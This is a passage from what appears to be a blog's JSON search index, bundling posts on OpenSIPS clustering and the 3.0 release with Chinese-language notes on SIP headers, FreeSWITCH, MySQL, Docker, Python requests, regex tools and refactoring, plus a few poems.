The aim of this extension of the OpenSIPS usrloc module is to provide a horizontally scalable solution that is easy to set up and maintain, while remaining flexible enough to cope with varying needs of each specific deployment.Throughout this text, by “data” we refer to SIP Addresses-of-Record (subscribers) and their dynamic SIP Contact bindings (network coordinates of their SIP devices) — all of these must be replicated across cluster nodes. From a data sharing point of view, we can break the distributed user location support down into two major modes of usage:\n“federation”, where each node holds a portion of the overall dataset. You can read everything about this data sharing strategy in this tutorial. “full sharing”, where all cluster nodes are homogeneous and interchangeable. In this article, we’re going to zoom in on the “full sharing” support, which is actually further broken down into two submodes of usage, depending on the size of your deployment: one where the dataset fits into OpenSIPS memory, and the other one where it is fully managed by a specialized NoSQL database.\nNative “Full Sharing” With native (OpenSIPS-only) data sharing, we make use of the clustering layer in order to replicate SIP AoRs and Contacts between nodes at runtime, as well as during the startup synchronization phase. An example setup would look like the following:\nNative “Full Sharing” ArchitectureNotice how the OpenSIPS cluster is front-ended by an additional SIP entity: a Session Border Controller. This is an essential requirement of this topology (and a common gotcha!). The idea is that the nodes, along with the way they use the data, must be identical. 
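To make the native full-sharing setup described above concrete, a minimal configuration sketch follows. This is not taken from the article: the module parameter names (clusterer current_id and db_url, usrloc location_cluster) and the database URL are assumptions that should be verified against the usrloc and clusterer documentation for your exact OpenSIPS version.

```cfg
loadmodule "clusterer.so"
loadmodule "usrloc.so"

# this node's ID within the cluster; the other cluster members are
# provisioned in the clusterer database table (assumed layout)
modparam("clusterer", "current_id", 1)
modparam("clusterer", "db_url", "mysql://opensips:opensipsrw@localhost/opensips")

# replicate AoRs and contacts to the other members of cluster 1,
# so that every node ends up holding the full user location dataset
modparam("usrloc", "location_cluster", 1)
```

With an identical configuration on every node (apart from current_id), a newly booted “joiner” node can request the full dataset from a “donor”, as described in the Cluster Sync section.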
This allows, for example, ramping the number of instances up or down when the platform is running at peak hour or sitting idle.Let’s take a look at some common platform management concerns and see how they are dealt with using the native “full sharing” topology.\nDealing with Node Failures Node failures in “full sharing” topologies are handled smoothly. Thanks to the SBC front-end that alleviates all IP restrictions, the service can withstand downtime from one or more cluster nodes without actually impacting the clients at all.\nSuccessfully completing a call through Node 2 after Node 1 goes offlineIn this diagram, cluster Node 1 goes offline due to a hardware failure. After the SIP INVITE transaction towards Node 1 times out, the SBC fails over to Node 2, successfully completing the call.\nRestart Persistency By having restart persistency, we ensure that we are able to restart a node without losing the cached dataset. There are two ways of achieving this, depending on whether you intend to use an SQL database or not.\nCluster Sync The clustering layer can also act as an initialization tool, allowing a newly booted “joiner” node to discover a consistent “donor” node from which to request a full data sync.\nSQL-based Users who prefer a more sturdy, disk-driven way of persisting data can easily configure an SQL database URL to which an OpenSIPS node will periodically flush its cached user location dataset.Recommendation: if you plan on using this feature, we recommend deploying a local database server on each node. 
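As a hedged sketch of the SQL-based persistence just described (the parameter values are illustrative; consult the usrloc module documentation for the exact db_mode semantics in your version):

```cfg
loadmodule "usrloc.so"

# flush the cached user location dataset to a local SQL database;
# mode 2 ("write-back") keeps contacts in memory and periodically
# syncs them to the DB, so they survive a restart
modparam("usrloc", "db_url", "mysql://opensips:opensipsrw@localhost/opensips")
modparam("usrloc", "db_mode", 2)
```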
Setting up multiple nodes to flush to a shared database using the old skip_replicated_db_ops feature may still work, but we no longer encourage or test such setups.\nContact Pinging Thanks to the clustering layer that makes nodes aware of the total number of online nodes, we are able to evenly spread the pinging workload across the current number of online cluster nodes at any given point in time.Configuration: You only have to configure the pinging-related module parameters of nathelper (e.g. sipping_bflag, sipping_from, natping_tcp, natping_interval) and set these flags for the contacts which require pinging. Nothing new, in short. The newly added pinging workload distribution logic will work right out of the box.\n“Full Sharing” via NoSQL NoSQL-based “Full Sharing”For deployments that are so large that the dataset outgrows the size of the OpenSIPS cache, or in case you simply don’t feel at ease with Gigabytes worth of cached SIP contacts in production, NoSQL may be a more pleasant alternative.With features such as data replication, data sharding and indexed columns, it may be a wise choice to leave the handling of large amounts of data to a specialized engine rather than doing it in-house. Configuring such setups will be a topic for an in-depth future tutorial, where we will learn how to configure “full sharing” user location clusters with both of the currently supported NoSQL engines: Apache Cassandra and MongoDB.\nSummary The “full sharing” data distribution strategy for the OpenSIPS user location is an intuitive solution which requires little to no additional OpenSIPS scripting (only a handful of module parameters). The major hurdles of running a SIP deployment (data redundancy, node failover, restart persistency and NAT traversal) have been carefully solved and baked into the module, without imposing any special script handling on the user. 
Moreover, depending on the sizing requirements of the target platform, users retain the flexibility of choosing between the native or NoSQL-based data management engines.\n","permalink":"https://wdd.js.org/opensips/blog/cluster-location/","summary":"The distributed SIP user location support is one of the major features of the latest stable OpenSIPS release, namely 2.4. The aim of this extension of the OpenSIPS usrloc module is to provide a horizontally scalable solution that is easy to set up and maintain, while remaining flexible enough to cope with varying needs of each specific deployment.Throughout this text, by “data” we refer to SIP Addresses-of-Record (subscribers) and their dynamic SIP Contact bindings (network coordinates of their SIP devices) — all of these must be replicated across cluster nodes.","title":"Clustered SIP User Location: The Full Sharing Topology"},{"content":"You already know the story – one more year, one more evolution cycle, one more OpenSIPS major release. Even more, a new OpenSIPS direction is about to start. So let me introduce you to the upcoming OpenSIPS 3.0.For the upcoming OpenSIPS 3.0 release (and 3.x family) the main focus is on the _devops_ concept. Shortly said, this translates into:\nmaking the OpenSIPS script writing/developing much easier simplifying the operational activities around OpenSIPS What features and functionality a piece of software is able to deliver is a very important factor. Nevertheless, how easy the software is to use and operate is another factor of almost the same importance. 
Especially if we consider the case of OpenSIPS, which is a very complex piece of software to configure, integrate and operate in large-scale multi-party platforms.\nThe “dev” aspects in OpenSIPS 3.0 This release is looking to improve the experience of the OpenSIPS script writer (developer), by enhancing and simplifying the OpenSIPS script, at all its levels.The script re-formatting (as structure), the addition of full pre-processor support, the enhancement of the script variables’ naming and support, the standardization of the complex modparams (and many others) will address the script writer’s needs of\neasiness, flexibility and strength when it comes to creating, managing and maintaining more and more complex OpenSIPS configurations.The full list of “dev” oriented features along with explanations and details is to be found in the official 3.0 planning document.\nThe “ops” aspects in OpenSIPS 3.0 The operational activity is a continuous job, starting from day one, when you first run your OpenSIPS. Usually there is a lot of time, effort and resources invested in these operational activities, so any extra help in the area is more than welcome.OpenSIPS 3.0 is planning several enhancements and new concepts in order to help with operating OpenSIPS – making it simpler to run, to monitor, to troubleshoot and diagnose.We are especially looking at reducing the need for restarts during service time – restarting your production OpenSIPS is something that any devops engineer will try to avoid as much as possible. New features such as auto-scaling (of the number of processes), runtime changes of module parameters or script reload address this fear. 
Even when a restart cannot be avoided, the internal memory persistence during restart may minimize the impact.But when it comes to vital operational activities like monitoring and understanding what is going on with your OpenSIPS, or troubleshooting calls or traffic handled by your OpenSIPS, the most important new additions for helping to operate OpenSIPS are:\ntracing console – provided by the new ‘opensipsctl’ tool, the console will allow you to see in realtime various information related to specific calls only. The information may be the OpenSIPS logs, SIP packets, script logs, rest queries, maybe DB queries self diagnosis tool – also provided by the opensipsctl tool, this is logic that collects various information from a running OpenSIPS (via MI) in regards to thresholds, load information, statistics and logs in order to locate and indicate a potential problem or bottleneck with your OpenSIPS. There are even more features that will simplify the way you operate your OpenSIPS – the full list (with explanations) is available in the official 3.0 planning document.\nMore integration aspects with OpenSIPS 3.0 The work to make possible the integration of OpenSIPS with other external components is a never-ending job. This release is no exception and addresses this need.A major rework of the Management Interface is ongoing, with the sole purpose of standardizing and simplifying the way you interact with the MI interface. Shifting to JSON encoding as the only way to pack data and re-structuring all the available transports (protocols) for interacting with the MI interface will enhance your experience in using this interface from any other language / application.The 3.0 release is planning to provide new modules for more integration capabilities:\nSMPP module – a bidirectional gateway / translator between SIP (MESSAGE requests) and the SMPP protocol. RabbitMQ consumer module – a RabbitMQ consumer that pushes messages as events into the OpenSIPS script. 
A more detailed description is available in the official 3.0 planning document.\nCommunity opinion is important The opinion of the community matters to us, so we need your feedback and comments in regards to the 3.0 Dev Plan.To express yourself on the 3.0 Dev Plan, please see the online form — you can give scores to the items in the plan and you can suggest other items. This feedback will be very useful for us in order to align the Dev Plan with the real needs of our community, of the people actually using OpenSIPS. Besides our ideas listed in the form, you can of course come up with your own ideas, or feature requests that we will gladly take into consideration.The deadline for submitting your answers in the form is the 6th of January 2019. After this deadline we will gather all your submissions and sort them according to your feedback. We will use the result to filter the topics you consider interesting and prioritize the most wanted ones.Also, to talk in more detail about the features of this new release, a public audio conference will be available on the 20th of December 2018, 4 pm GMT, thanks to the kind sponsorship of UberConference. Anyone is welcome to join to find out more details or to ask questions about OpenSIPS 3.0.This is a public and open conference, so no registration is needed.\nThe timeline The timeline for OpenSIPS 3.0 is:\nBeta Release – 18-31 March 2019 Stable Release – 22-29 April 2019 General Availability – 30th of April 2019, during OpenSIPS Summit 2019 ","permalink":"https://wdd.js.org/opensips/blog/opensips3x/","summary":"You already know the story – one more year, one more evolution cycle, one more OpenSIPS major release. Even more, a new OpenSIPS direction is about to start. So let me introduce you to the upcoming OpenSIPS 3.0.For the upcoming OpenSIPS 3.0 release (and 3.x family) the main focus is on the _devops_ concept. 
Shortly said, this translates into:\nmaking the OpenSIPS script writing/developing much easier simplifying the operational activities around OpenSIPS What features and functionality a piece of software is able to deliver is a very important factor.","title":"Introducing OpenSIPS 3.0"},{"content":"问题分为两种,一种是搜索引擎能够找到答案的,另一种是搜索引擎找不到答案的。\n按照80-20原则,前者估计能占到80%,而后者能占到20%。\n1 搜索引擎的使用 1.1 如何让搜索引擎更加理解你? 如果你能理解搜索引擎,那么搜索引擎会更加理解你。\n搜索引擎是基于关键词去搜索的,所以尽量给搜索引擎关键词,而不是大段的报错 关键词的顺序很重要,把重要的关键词放在靠前的位置 1.2 如何提炼关键词? 1.3 不错的搜索引擎推荐? 2 当搜索引擎无法解决时? 当搜索引擎无法解决时,可以从哪些方面思考?\n拼写或者格式等错误 上下文不理解,语境不清晰,断章取义 ","permalink":"https://wdd.js.org/posts/2019/07/bq7ih4/","summary":"问题分为两种,一种是搜索引擎能够找到答案的,另一种是搜索引擎找不到答案的。\n按照80-20原则,前者估计能占到80%,而后者能占到20%。\n1 搜索引擎的使用 1.1 如何让搜索引擎更加理解你? 如果你能理解搜索引擎,那么搜索引擎会更加理解你。\n搜索引擎是基于关键词去搜索的,所以尽量给搜索引擎关键词,而不是大段的报错 关键词的顺序很重要,把重要的关键词放在靠前的位置 1.2 如何提炼关键词? 1.3 不错的搜索引擎推荐? 2 当搜索引擎无法解决时? 当搜索引擎无法解决时,可以从哪些方面思考?\n拼写或者格式等错误 上下文不理解,语境不清晰,断章取义 ","title":"解决问题的思维模式"},{"content":"梦与诗 胡适 醉过才知酒浓爱过才知情重你不能做我的诗正如我不能做你的梦\n情歌 刘半农天上飘着些微云地上吹着些微风啊!微风吹动了我的头发教我如何不想她?\n沙扬娜拉 赠日本女郎 徐志摩最是那一低头的温柔像一朵水莲花不胜凉风的娇羞道一声珍重道一声珍重那一声珍重里有蜜甜的忧愁沙扬娜拉!\n再别康桥 徐志摩轻轻地我走了正如我轻轻地来我轻轻地招手作别西天的云彩\n伊眼底 汪静之伊眼底是温暖的太阳不然,何以伊一望着我我受了冻的心就热了呢\n","permalink":"https://wdd.js.org/posts/2019/07/icwy4b/","summary":"梦与诗 胡适 醉过才知酒浓爱过才知情重你不能做我的诗正如我不能做你的梦\n情歌 刘半农天上飘着些微云地上吹着些微风啊!微风吹动了我的头发教我如何不想她?\n沙扬娜拉 赠日本女郎 徐志摩最是那一低头的温柔像一朵水莲花不胜凉风的娇羞道一声珍重道一声珍重那一声珍重里有蜜甜的忧愁沙扬娜拉!\n再别康桥 徐志摩轻轻地我走了正如我轻轻地来我轻轻地招手作别西天的云彩\n伊眼底 汪静之伊眼底是温暖的太阳不然,何以伊一望着我我受了冻的心就热了呢","title":"现代诗 五首 摘抄"},{"content":"Docker ghost 安装 docker run -d --name myghost -p 8090:2368 -e url=http://172.16.200.228:8090/ \\ -v /root/volumes/ghost:/var/lib/ghost/content ghost 模板修改 参考 https://www.ghostforbeginners.com/move-featured-posts-to-the-top-of-your-blog/ ","permalink":"https://wdd.js.org/posts/2019/07/ae4atc/","summary":"Docker ghost 安装 docker run -d --name myghost -p 8090:2368 -e url=http://172.16.200.228:8090/ \\ -v /root/volumes/ghost:/var/lib/ghost/content ghost 模板修改 参考 
https://www.ghostforbeginners.com/move-featured-posts-to-the-top-of-your-blog/ ","title":"ghost博客 固定feature博客"},{"content":"在所有的fifo命令中,which命令比较重要,因为它可以列出所有的其他命令。\n有些mi命令是存在于各个模块之中,所以加载的模块不同,opensipsctl fifo which输出的命令也不同。\n获取执行参数 opensipsctl fifo arg 列出TCP连接数量 opensipsctl fifo list_tcp_conns 查看进程信息 opensipsctl fifo ps 查看opensips运行时长 opensipsctl fifo uptime 查看所有支持的指令 opensipsctl fifo which 获取统计数据 opensipsctl fifo get_statistics rcv_requests 重置统计数据 opensipsctl fifo get_statistics received_replies get_statistics reset_statistics uptime version pwd arg which ps kill debug cache_store cache_fetch cache_remove event_subscribe events_list subscribers_list list_tcp_conns help list_blacklists regex_reload t_uac_dlg t_uac_cancel t_hash t_reply ul_rm ul_rm_contact ul_dump ul_flush ul_add ul_show_contact ul_sync domain_reload domain_dump dlg_list dlg_list_ctx dlg_end_dlg dlg_db_sync dlg_restore_db profile_get_size profile_list_dlgs profile_get_values list_all_profiles nh_enable_ping cr_reload_routes cr_dump_routes cr_replace_host cr_deactivate_host cr_activate_host cr_add_host cr_delete_host dp_reload dp_translate address_reload address_dump subnet_dump allow_uri dr_reload dr_gw_status dr_carrier_status lb_reload lb_resize lb_list lb_status httpd_list_root_path sip_trace rtpengine_enable rtpengine_show rtpengine_reload teardown ","permalink":"https://wdd.js.org/opensips/ch3/core-mi/","summary":"在所有的fifo命令中,which命令比较重要,因为它可以列出所有的其他命令。\n有些mi命令是存在于各个模块之中,所以加载的模块不同,opensipsctl fifo which输出的命令也不同。\n获取执行参数 opensipsctl fifo arg 列出TCP连接数量 opensipsctl fifo list_tcp_conns 查看进程信息 opensipsctl fifo ps 查看opensips运行时长 opensipsctl fifo uptime 查看所有支持的指令 opensipsctl fifo which 获取统计数据 opensipsctl fifo get_statistics rcv_requests 重置统计数据 opensipsctl fifo get_statistics received_replies get_statistics reset_statistics uptime version pwd arg which ps kill debug cache_store cache_fetch cache_remove event_subscribe events_list subscribers_list list_tcp_conns help list_blacklists regex_reload 
t_uac_dlg t_uac_cancel t_hash t_reply ul_rm ul_rm_contact ul_dump ul_flush ul_add ul_show_contact ul_sync domain_reload domain_dump dlg_list dlg_list_ctx dlg_end_dlg dlg_db_sync dlg_restore_db profile_get_size profile_list_dlgs profile_get_values list_all_profiles nh_enable_ping cr_reload_routes cr_dump_routes cr_replace_host cr_deactivate_host cr_activate_host cr_add_host cr_delete_host dp_reload dp_translate address_reload address_dump subnet_dump allow_uri dr_reload dr_gw_status dr_carrier_status lb_reload lb_resize lb_list lb_status httpd_list_root_path sip_trace rtpengine_enable rtpengine_show rtpengine_reload teardown ","title":"核心MI命令"},{"content":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; 随机选择一个数据 SELECT name FROM table_name order by rand() limit 1\n","permalink":"https://wdd.js.org/posts/2019/07/bk7r40/","summary":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; 随机选择一个数据 SELECT name FROM table_name order by rand() limit 1","title":"MySql学习"},{"content":"\n自定义SIP消息头如何从通道变量中获取? if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. To access that variable, you should strip off the variable_, and just do ${sip_h_type}\n","permalink":"https://wdd.js.org/freeswitch/get-sip-header/","summary":"自定义SIP消息头如何从通道变量中获取? if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. 
To access that variable, you should strip off the variable_, and just do ${sip_h_type}","title":"通道变量与SIP 消息头"},{"content":"【少年】慈母手中线,游子身上衣【毕业】浔阳江头夜送客,枫叶荻花秋瑟瑟【实习】千呼万唤始出来,犹抱琵琶半遮面【工作加班】衣带渐宽终不悔,为伊消得人憔悴【同学结婚】昔别君未婚,儿女忽成行【表白】欲得周郎顾,时时误拂弦【恋爱】在天愿作比翼鸟,在地愿为连理枝【分手】别有幽愁暗恨生,此时无声胜有声【春节回家】近乡情更怯,不敢问来人【车站遇友】马上相逢无纸笔,凭君传语报平安【外婆去世】洛阳亲友如相问,一片冰心在玉壶【节后会沪】两岸猿声啼不住,动车已过万重山【情人节】天阶夜色凉如水,坐看牵牛织女星【重游南京】浮云一别后,流水十年间【秦淮灯会】云想衣裳花想容,春风拂槛露华浓\n","permalink":"https://wdd.js.org/posts/2019/07/fabbky/","summary":"【少年】慈母手中线,游子身上衣【毕业】浔阳江头夜送客,枫叶荻花秋瑟瑟【实习】千呼万唤始出来,犹抱琵琶半遮面【工作加班】衣带渐宽终不悔,为伊消得人憔悴【同学结婚】昔别君未婚,儿女忽成行【表白】欲得周郎顾,时时误拂弦【恋爱】在天愿作比翼鸟,在地愿为连理枝【分手】别有幽愁暗恨生,此时无声胜有声【春节回家】近乡情更怯,不敢问来人【车站遇友】马上相逢无纸笔,凭君传语报平安【外婆去世】洛阳亲友如相问,一片冰心在玉壶【节后会沪】两岸猿声啼不住,动车已过万重山【情人节】天阶夜色凉如水,坐看牵牛织女星【重游南京】浮云一别后,流水十年间【秦淮灯会】云想衣裳花想容,春风拂槛露华浓","title":"无题 再读唐诗宋词"},{"content":"汤婆婆给千寻签订了契约,之后千寻的名字被抹去了,每个人都叫千寻小千,甚至千寻自己,也忘记了自己原来的名字。\n但是只有白先生告诫千寻,一定要记住自己的名字,否则再也无法回到原来的世界。而白先生自己,就是那个已经无法回到原来世界的人。\n最重要的是记住自己的名字 名字要有意义 不要使用缩写,缩写会让你忘记自己的原来的名字 没有工作的人,会变成妖怪的 没有用的变量,会变成垃圾 别吃得太胖,会被杀掉的 别占用太多内存,会被操作系统给杀掉的 ","permalink":"https://wdd.js.org/posts/2019/07/gzfn7t/","summary":"汤婆婆给千寻签订了契约,之后千寻的名字被抹去了,每个人都叫千寻小千,甚至千寻自己,也忘记了自己原来的名字。\n但是只有白先生告诫千寻,一定要记住自己的名字,否则再也无法回到原来的世界。而白先生自己,就是那个已经无法回到原来世界的人。\n最重要的是记住自己的名字 名字要有意义 不要使用缩写,缩写会让你忘记自己的原来的名字 没有工作的人,会变成妖怪的 没有用的变量,会变成垃圾 别吃得太胖,会被杀掉的 别占用太多内存,会被操作系统给杀掉的 ","title":"从千与千寻谈编程风格"},{"content":"Photo by Blair Fraser on Unsplash\n从头开发一个软件只是小儿科,改进一个程序才显真本事。《若为自由故 自由软件之父理查德·斯托曼传》\n每个人都有从零开发软件的处女情结,但是事实上我们大多数时候都在维护别人的代码。\n所以,别人写的代码如何糟糕,你再抱怨也是无意义的。\n从内心中问自己,你究竟是在抱怨别人,还是不敢面对自己脆弱的内心。\n老代码的意义 廉颇老矣,尚能饭否。\n老代码的有很多缺点,如难以维护,逻辑混乱。但是老代码有唯一的好处,就是老代码经过生产环境的洗礼。这至少能证明老代码能够稳定运行,不出问题。\n东西,如果不出问题,就不要动它。\n老代码可能存在哪些问题 老代码的问题,就是我们重构的点。首先我们要明确,老代码中有哪些问题。\n模块性不强,重复代码太多 逻辑混乱,业务逻辑和框架逻辑混杂 注释混乱:特别要小心,很多老代码中的注释都可能不知道祖传多少代了。如果你要按着注释去理解,很可能南辕北辙,走火入魔。按照代码的执行去理解业务逻辑,而不是按照注释。 配置性的硬代码和业务逻辑混杂,这个是需要在后期抽离的 如果你无法理解,请勿重构 带着respect, 也带着质疑,阅读并理解老代码。取其精华,去其糟粕。如果你还不理解老代码,就别急着重构它,让子弹飞一会。\n等自己能够理解老代码时,再去重构。我相信在理解基础上重构,会更快,也更安全。\n不要大段改写,要见缝插针 
不要在老代码中直接写自己的代码,应该使用函数。\n在老代码中改动一行,调用自己写的函数。\n几乎每种语言中都有函数这种组织代码的形式,通过见缝插针调用函数的方式。能够尽量减少老代码的改动,如果出现问题,也比较容易调试。\n","permalink":"https://wdd.js.org/posts/2019/07/osb460/","summary":"Photo by Blair Fraser on Unsplash\n从头开发一个软件只是小儿科,改进一个程序才显真本事。《若为自由故 自由软件之父理查德·斯托曼传》\n每个人都有从零开发软件的处女情结,但是事实上我们大多数时候都在维护别人的代码。\n所以,别人写的代码如何糟糕,你再抱怨也是无意义的。\n从内心中问自己,你究竟是在抱怨别人,还是不敢面对自己脆弱的内心。\n老代码的意义 廉颇老矣,尚能饭否。\n老代码的有很多缺点,如难以维护,逻辑混乱。但是老代码有唯一的好处,就是老代码经过生产环境的洗礼。这至少能证明老代码能够稳定运行,不出问题。\n东西,如果不出问题,就不要动它。\n老代码可能存在哪些问题 老代码的问题,就是我们重构的点。首先我们要明确,老代码中有哪些问题。\n模块性不强,重复代码太多 逻辑混乱,业务逻辑和框架逻辑混杂 注释混乱:特别要小心,很多老代码中的注释都可能不知道祖传多少代了。如果你要按着注释去理解,很可能南辕北辙,走火入魔。按照代码的执行去理解业务逻辑,而不是按照注释。 配置性的硬代码和业务逻辑混杂,这个是需要在后期抽离的 如果你无法理解,请勿重构 带着respect, 也带着质疑,阅读并理解老代码。取其精华,去其糟粕。如果你还不理解老代码,就别急着重构它,让子弹飞一会。\n等自己能够理解老代码时,再去重构。我相信在理解基础上重构,会更快,也更安全。\n不要大段改写,要见缝插针 不要在老代码中直接写自己的代码,应该使用函数。\n在老代码中改动一行,调用自己写的函数。\n几乎每种语言中都有函数这种组织代码的形式,通过见缝插针调用函数的方式。能够尽量减少老代码的改动,如果出现问题,也比较容易调试。","title":"如何维护老代码?"},{"content":"regex101: 功能最强 https://regex101.com/\nregex101的功能最强,支持php, js, python, 和go的正则表达式\nRegulex:正则可视化 https://jex.im/regulex/#!flags=\u0026amp;re=%5E(a%7Cb)*%3F%24\nregulex仅支持js的正则,\nregexper:正则可视化 https://regexper.com/\npyregex:专注python正则 http://www.pyregex.com/\n","permalink":"https://wdd.js.org/fe/regex-tools/","summary":"regex101: 功能最强 https://regex101.com/\nregex101的功能最强,支持php, js, python, 和go的正则表达式\nRegulex:正则可视化 https://jex.im/regulex/#!flags=\u0026amp;re=%5E(a%7Cb)*%3F%24\nregulex仅支持js的正则,\nregexper:正则可视化 https://regexper.com/\npyregex:专注python正则 http://www.pyregex.com/","title":"Regex Tools"},{"content":"基于python # 基于python2 python -m SimpleHTTPServer 8088 # 基于python3 python -m http.server 8088 基于Node.js https://github.com/zeit/serve https://github.com/http-party/http-server ","permalink":"https://wdd.js.org/posts/2019/07/stxzl6/","summary":"基于python # 基于python2 python -m SimpleHTTPServer 8088 # 基于python3 python -m http.server 8088 基于Node.js https://github.com/zeit/serve https://github.com/http-party/http-server 
","title":"1秒搭建静态文件服务器"},{"content":"上传文件 import requests headers = { \u0026#34;ssid\u0026#34;:\u0026#34;1234\u0026#34; } files = {\u0026#39;file\u0026#39;: open(\u0026#39;yourfile.tar.gz\u0026#39;, \u0026#39;rb\u0026#39;)} url=\u0026#34;http://localhost:1345/fileUpload/\u0026#34; r = requests.post(url, files=files, headers=headers) print(r.status_code) ","permalink":"https://wdd.js.org/posts/2019/07/ya30bi/","summary":"上传文件 import requests headers = { \u0026#34;ssid\u0026#34;:\u0026#34;1234\u0026#34; } files = {\u0026#39;file\u0026#39;: open(\u0026#39;yourfile.tar.gz\u0026#39;, \u0026#39;rb\u0026#39;)} url=\u0026#34;http://localhost:1345/fileUpload/\u0026#34; r = requests.post(url, files=files, headers=headers) print(r.status_code) ","title":"python request 库学习"},{"content":"fs日志级别\n0 \u0026#34;CONSOLE\u0026#34;, 1 \u0026#34;ALERT\u0026#34;, 2 \u0026#34;CRIT\u0026#34;, 3 \u0026#34;ERR\u0026#34;, 4 \u0026#34;WARNING\u0026#34;, 5 \u0026#34;NOTICE\u0026#34;, 6 \u0026#34;INFO\u0026#34;, 7 \u0026#34;DEBUG\u0026#34; 日志级别设置的越高,显示的日志越多\n在autoload_configs/switch.conf.xml 设置了一些快捷键,可以在fs_cli中使用\nF7将日志级别设置为0,显示的日志最少 F8将日志级别设置为7, 显示日志最多 同时也可以使用 console loglevel指令自定义设置级别\nconsole loglevel 1 console loglevel notice 参考 https://freeswitch.org/confluence/display/FREESWITCH/Troubleshooting+Debugging ","permalink":"https://wdd.js.org/freeswitch/fs-log-level/","summary":"fs日志级别\n0 \u0026#34;CONSOLE\u0026#34;, 1 \u0026#34;ALERT\u0026#34;, 2 \u0026#34;CRIT\u0026#34;, 3 \u0026#34;ERR\u0026#34;, 4 \u0026#34;WARNING\u0026#34;, 5 \u0026#34;NOTICE\u0026#34;, 6 \u0026#34;INFO\u0026#34;, 7 \u0026#34;DEBUG\u0026#34; 日志级别设置的越高,显示的日志越多\n在autoload_configs/switch.conf.xml 设置了一些快捷键,可以在fs_cli中使用\nF7将日志级别设置为0,显示的日志最少 F8将日志级别设置为7, 显示日志最多 同时也可以使用 console loglevel指令自定义设置级别\nconsole loglevel 1 console loglevel notice 参考 https://freeswitch.org/confluence/display/FREESWITCH/Troubleshooting+Debugging ","title":"fs日志级别"},{"content":" from字段用来标记请求的发起者ID to字段用来标记请求接受者的ID to字段并不能用于路由,request-url可以用来路由 
一般情况下,sip消息再传输过程中,from和to字段都不会改,而request-url很可能会因为路由而改变 对于最初的请求,除了注册请求之外,request-url和to字段中的url一致 from字段:The From header field is a required header field that indicates the originator of the request. It is one of two addresses used to identify the dialog. The From header field contains a URI, but it may not contain the transport, maddr, or ttl URI parameters. A From header field may contain a tag used to identify a particular call. A From header field may contain a display name, in which case the URI is enclosed in \u0026lt; \u0026gt;. If there is both a URI parameter and a tag, then the URI including any parameters must be enclosed in \u0026lt; \u0026gt;. Examples are shown in Table 6.8. A From tag was optional in RFC 2543 but is mandatory to include in RFC 3261.\nto字段:**The To header field is a required header field in every SIP message used to indicate the recipient of the request. Any responses generated by a UA will contain this header field with the addition of a tag. (Note that an RFC 2543 client will typically only generate a tag if more than one Via header field is present in the request.) Any response generated by a proxy must have a tag added to the To header field. A tag added to the header field in a 200 OK response is used through- out the call and incorporated into the dialog. The To header field URI is never used for routing—the Request-URI is used for this purpose. An optional display name can be present in the header field, in which case the SIP URI is enclosed in \u0026lt; \u0026gt;. If the URI contains any parameters or username parameters, the URI must be enclosed in \u0026lt; \u0026gt; even if no display name is present. The compact form of the header field is t. 
Examples are shown in Table 6.12.\n上面的信令图属于一个dialog, 并且包含三个事务\ninvite 到 200 ok属于一个事务 ack是单独的一个事务 bye和200 ok属于一个事务 在同一个事务中,from和to中的sip url和tag都是相同的,但是对于不同的事务,from和to头的url和tag会相反。\n# 事务1: INVITE 180 200 From: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa To: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb # 事务2: ACK From: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa To: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb # 事务3: BYE 200 ok # 由于事务3的发起方是B, 所以 From: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb To: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa 所以在处理OpenSIPS脚本的时候,特别是关于from_tag和to_tag的处理的时候,我们不能先入为主的认为初始化和序列化的的所有请求里from_tag和to_tag都是不变的。 也不能先入为主的认为from_url和 to_url是一成不变的。\n所以我们就必须深入的认识到,from和to实际上是标志着这个事务的方向。而不是dialog的方向。\n【重点】初始化请求和序列化请求\nrfc 3261 request url The initial Request-URI of the message SHOULD be set to the value of the URI in the To field. One notable exception is the REGISTER method; behavior for setting the Request-URI of REGISTER is given in Section 10. It may also be undesirable for privacy reasons or convenience to set these fields to the same value (especially if the originating UA expects that the Request-URI will be changed during transit). In some special circumstances, the presence of a pre-existing route set can affect the Request-URI of the message. A pre-existing route set is an ordered set of URIs that identify a chain of servers, to which a UAC will send outgoing requests that are outside of a dialog. Commonly, they are configured on the UA by a user or service provider manually, or through some other non-SIP mechanism. When a provider wishes to configure a UA with an outbound proxy, it is RECOMMENDED that this be done by providing it with a pre-existing route set with a single URI, that of the outbound proxy. 
When a pre-existing route set is present, the procedures for populating the Request-URI and Route header field detailed in Section 12.2.1.1 MUST be followed (even though there is no dialog), using the desired Request-URI as the remote target URI.\n","permalink":"https://wdd.js.org/opensips/ch1/from-to-request-url/","summary":"from字段用来标记请求的发起者ID to字段用来标记请求接受者的ID to字段并不能用于路由,request-url可以用来路由 一般情况下,sip消息再传输过程中,from和to字段都不会改,而request-url很可能会因为路由而改变 对于最初的请求,除了注册请求之外,request-url和to字段中的url一致 from字段:The From header field is a required header field that indicates the originator of the request. It is one of two addresses used to identify the dialog. The From header field contains a URI, but it may not contain the transport, maddr, or ttl URI parameters. A From header field may contain a tag used to identify a particular call. A From header field may contain a display name, in which case the URI is enclosed in \u0026lt; \u0026gt;.","title":"from vs to vs request-url之间的关系"},{"content":"建议日志格式 xlog(\u0026#34;$rm $fu-\u0026gt;$tu:$cfg_line some msg\u0026#34;) 日志级别 L_ALERT (-3) L_CRIT (-2) L_ERR (-1) - this is used by default if log_level is omitted L_WARN (1) L_NOTICE (2) L_INFO (3) L_DBG (4) 日志级别如果设置为2, 那么只会打印小于等于2的日志。默认使用xlog(\u0026ldquo;hello\u0026rdquo;), 那么日志级别就会是L_ERR\n生产环境建议将日志界别调整到-1\n1.x的opensips使用 debug=3 